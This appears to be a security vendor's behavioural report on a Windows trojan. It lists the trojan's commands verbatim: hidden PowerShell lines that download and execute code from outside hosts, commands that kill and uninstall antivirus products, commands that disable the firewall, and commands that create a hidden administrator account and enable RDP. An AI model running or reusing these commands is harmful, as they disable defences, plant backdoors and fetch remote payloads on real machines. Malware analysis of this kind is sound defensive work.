Trojan.Siggen13.4654

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\blackball
<SYSTEM32>\tasks\uidnxht
<SYSTEM32>\tasks\dizu43\1yzo2bge
<SYSTEM32>\tasks\microsoft\windows\js29h5qm\y9smpjvub7s

Sets the following service settings

[<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'

Malicious functions

To bypass firewall, removes or modifies the following registry keys

[<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
[<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'

Executes the following

'<SYSTEM32>\taskkill.exe' /im 360bdoctor.exe /F
'<SYSTEM32>\taskkill.exe' /im 360rp.exe /F
'<SYSTEM32>\taskkill.exe' /im 360rps.exe /F
'<SYSTEM32>\taskkill.exe' /im 360safe_cq.exe /F
'<SYSTEM32>\taskkill.exe' /im 360safe_se.exe /F
'<SYSTEM32>\taskkill.exe' /im 360sd.exe /F
'<SYSTEM32>\taskkill.exe' /im 360speedld.exe /F
'<SYSTEM32>\taskkill.exe' /im 360Tray.exe /F
'<SYSTEM32>\taskkill.exe' /im 360LogCenter.exe /F
'<SYSTEM32>\taskkill.exe' /im 360se.exe /F
'<SYSTEM32>\netsh.exe' firewall add portopening tcp 65529 SDNSd
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block

Downloads

http://+t.###+catkit.com/a.jsp?ip################################ as %username%
http://+d###.#sqlnetcat.com/a.jsp?ip################################ as %username%
http://+t.###+netcat.com/a.jsp?ip################################ as %username%

Network activity

UDP

DNS ASK microsoft.com
DNS ASK t.###catkit.com
DNS ASK do##.#qlnetcat.com
DNS ASK t.###netcat.com

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: ''

Creates and executes the following

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c I`ex ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://'+##.##t'+'catkit.com/a.jsp?ip########################################################...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c I`ex ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://'+#####.'+'sqlnetcat.com/a.jsp?ip#####################################################...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c I`ex ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://'+##.##l'+'netcat.com/a.jsp?ip########################################################...' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c sc delete SAVService
'<SYSTEM32>\sc.exe' delete SAVService
'<SYSTEM32>\cmd.exe' /c sc delete SAVAdminService
'<SYSTEM32>\sc.exe' delete SAVAdminService
'<SYSTEM32>\cmd.exe' /c sc delete SavexSrvc
'<SYSTEM32>\sc.exe' delete SavexSrvc
'<SYSTEM32>\sc.exe' delete "Sophos AutoUpdate Service"
'<SYSTEM32>\cmd.exe' /c sc delete PMContExtrSvc
'<SYSTEM32>\sc.exe' delete "Sophos Endpoint Defense Service"
'<SYSTEM32>\cmd.exe' /c sc delete MMRot
'<SYSTEM32>\cmd.exe' /c sc delete PMScanner
'<SYSTEM32>\sc.exe' delete PMScanner
'<SYSTEM32>\cmd.exe' /c sc delete PMEVizsla
'<SYSTEM32>\sc.exe' delete PMEVizsla
'<SYSTEM32>\cmd.exe' /c sc delete SavexWebAgent
'<SYSTEM32>\sc.exe' delete SavexWebAgent
'<SYSTEM32>\sc.exe' delete PMContExtrSvc
'<SYSTEM32>\cmd.exe' /c sc delete swi_filter
'<SYSTEM32>\sc.exe' delete MMRot
'<SYSTEM32>\cmd.exe' /c sc delete "Sophos Endpoint Defense Service"
'<SYSTEM32>\cmd.exe' /c sc delete "Sophos AutoUpdate Service"
'<SYSTEM32>\sc.exe' delete "Sophos System Protection Service"
'<SYSTEM32>\sc.exe' stop SavexSrvc
'<SYSTEM32>\cmd.exe' /c sc stop PMContExtrSvc
'<SYSTEM32>\sc.exe' stop PMContExtrSvc
'<SYSTEM32>\cmd.exe' /c sc stop MMRot
'<SYSTEM32>\sc.exe' stop MMRot
'<SYSTEM32>\cmd.exe' /c sc stop PMScanner
'<SYSTEM32>\sc.exe' stop PMScanner
'<SYSTEM32>\sc.exe' stop SAVAdminService
'<SYSTEM32>\cmd.exe' /c sc stop PMEVizsla
'<SYSTEM32>\cmd.exe' /c sc stop SavexWebAgent
'<SYSTEM32>\sc.exe' stop SavexWebAgent
'<SYSTEM32>\cmd.exe' /c sc stop swi_filter
'<SYSTEM32>\sc.exe' stop swi_filter
'<SYSTEM32>\cmd.exe' /c sc stop swi_service
'<SYSTEM32>\sc.exe' stop swi_service
'<SYSTEM32>\cmd.exe' /c sc stop MBAMService
'<SYSTEM32>\sc.exe' stop MBAMService
'<SYSTEM32>\sc.exe' stop PMEVizsla
'<SYSTEM32>\cmd.exe' /c sc delete "Sophos System Protection Service"
'<SYSTEM32>\cmd.exe' /c sc stop SAVAdminService
'<SYSTEM32>\cmd.exe' /c sc stop SavexSrvc
'<SYSTEM32>\sc.exe' delete swi_filter
'<SYSTEM32>\sc.exe' delete MBAMService
'<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js\*
'<SYSTEM32>\attrib.exe' +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js\*
'<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js\demo
'<SYSTEM32>\attrib.exe' +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js\demo
'<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js\demo\*
'<SYSTEM32>\attrib.exe' +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js\demo\*
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
'<SYSTEM32>\cmd.exe' /c attrib +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js
'<SYSTEM32>\attrib.exe' +a +s +r +h C:\inetpub\wwwroot\aspnet_client\js
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \uiDnXHt /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn DIzU43\1yzo2bGe /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /run /tn DIzU43\1yzo2bGe
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\js29H5Qm\y9smPjVub7S /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /run /tn MicroSoft\Windows\js29H5Qm\y9smPjVub7S
'<SYSTEM32>\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd
'<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa2 /F
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c PS_CMD
'<SYSTEM32>\schtasks.exe' /run /tn \uiDnXHt
'<SYSTEM32>\cmd.exe' /c md C:\inetpub\wwwroot\aspnet_client\js\demo
'<SYSTEM32>\net.exe' user netcat /ACTIVE:YES
'<SYSTEM32>\sc.exe' stop SecurityHealthService
'<SYSTEM32>\cmd.exe' /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
'<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
'<SYSTEM32>\cmd.exe' /c wmic RDTOGGLE WHERE ServerName=%COMPUTERNAME% call SetAllowTSConnections 1
'<SYSTEM32>\wbem\wmic.exe' RDTOGGLE WHERE ServerName=lrextevgomki call SetAllowTSConnections 1
'<SYSTEM32>\cmd.exe' /c net user "netcat qweqwe$123123" /add
'<SYSTEM32>\net.exe' user "netcat qweqwe$123123" /add
'<SYSTEM32>\net1.exe' user "netcat qweqwe$123123" /add
'<SYSTEM32>\cmd.exe' /c net LOCALGROUP administrators netcat /add
'<SYSTEM32>\net.exe' LOCALGROUP administrators netcat /add
'<SYSTEM32>\net1.exe' LOCALGROUP administrators netcat /add
'<SYSTEM32>\cmd.exe' /c net LOCALGROUP "Remote Desktop Users" netcat /add
'<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" netcat /add
'<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" netcat /add
'<SYSTEM32>\cmd.exe' /c net LOCALGROUP "Enterprise Admins" netcat /add
'<SYSTEM32>\net.exe' LOCALGROUP "Enterprise Admins" netcat /add
'<SYSTEM32>\net1.exe' LOCALGROUP "Enterprise Admins" netcat /add
'<SYSTEM32>\cmd.exe' /c net user netcat /ACTIVE:YES
'<SYSTEM32>\cmd.exe' /c sc delete swi_service
'<SYSTEM32>\cmd.exe' /c sc delete MBAMService
'<SYSTEM32>\sc.exe' delete swi_service
'<SYSTEM32>\sc.exe' stop SAVService
'<SYSTEM32>\cmd.exe' /c sc stop SAVService
'<SYSTEM32>\sc.exe' stop "Sophos Endpoint Defense Service"
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360bdoctor.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360netcfg.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360netcfg.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360Seclogon
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360Seclogon
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360rp.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360????
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360rp.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360bdoctor.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360rps.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360safe.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360safe_cq.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360safe_cq.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360EvtMgr.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360EvtMgr.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360se.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360rps.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360LeakFixer.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360safe.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360LeakFixer.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule LiveUpdate360
'<SYSTEM32>\wbem\wmic.exe' product where "name like '%Eset%'" call uninstall /nointeractive
'<SYSTEM32>\wbem\wmic.exe' product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
'<SYSTEM32>\wbem\wmic.exe' product where "name like '%avast%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
'<SYSTEM32>\wbem\wmic.exe' product where "name like '%avp%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
'<SYSTEM32>\wbem\wmic.exe' product where "name like '%Security%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
'<SYSTEM32>\wbem\wmic.exe' product where "name like '%AntiVirus%'" call uninstall /nointeractive
'<SYSTEM32>\wbem\wmic.exe' product where "name like '%Norton Security%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
'<SYSTEM32>\cmd.exe' /c netsh advfirewall set allprofiles state off
'<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360????????
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360????????
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule LiveUpdate360
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360se.exe
'<SYSTEM32>\cmd.exe' /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360????-????
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360????
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360????-????
'<SYSTEM32>\cmd.exe' /c sc stop WaaSMedicSvc
'<SYSTEM32>\cmd.exe' /c sc stop WerSvc
'<SYSTEM32>\sc.exe' stop WerSvc
'<SYSTEM32>\cmd.exe' /c sc stop mpssvc
'<SYSTEM32>\sc.exe' stop mpssvc
'<SYSTEM32>\cmd.exe' /c sc stop Sense
'<SYSTEM32>\sc.exe' stop Sense
'<SYSTEM32>\cmd.exe' /c sc stop WdNisSvc
'<SYSTEM32>\sc.exe' stop WdNisSvc
'<SYSTEM32>\cmd.exe' /c sc stop WinDefend
'<SYSTEM32>\sc.exe' stop WinDefend
'<SYSTEM32>\cmd.exe' /c sc stop uhssvc
'<SYSTEM32>\sc.exe' stop uhssvc
'<SYSTEM32>\cmd.exe' /c sc stop "Sophos System Protection Service"
'<SYSTEM32>\sc.exe' stop "Sophos System Protection Service"
'<SYSTEM32>\cmd.exe' /c sc stop "Sophos AutoUpdate Service"
'<SYSTEM32>\sc.exe' stop "Sophos AutoUpdate Service"
'<SYSTEM32>\cmd.exe' /c sc stop "Sophos Endpoint Defense Service"
'<SYSTEM32>\sc.exe' stop wuauserv
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360sdUpd.exe
'<SYSTEM32>\sc.exe' stop WaaSMedicSvc
'<SYSTEM32>\net1.exe' user netcat /ACTIVE:YES
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa1 /F
'<SYSTEM32>\cmd.exe' /c sc stop SecurityHealthService
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360????-??
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360????-??
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360sd.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360sd.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360speedld.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360speedld.exe
'<SYSTEM32>\cmd.exe' /c netsh advfirewall firewall delete rule 360Tray.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360Tray.exe
'<SYSTEM32>\netsh.exe' advfirewall firewall delete rule 360sdUpd.exe
'<SYSTEM32>\cmd.exe' /c taskkill /im 360bdoctor.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360rps.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360safe_cq.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360safe_se.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360sd.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360speedld.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360Tray.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360LogCenter.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360se.exe /F
'<SYSTEM32>\cmd.exe' /c taskkill /im 360rp.exe /F
'<SYSTEM32>\cmd.exe' /c sc stop wuauserv
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa /F

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial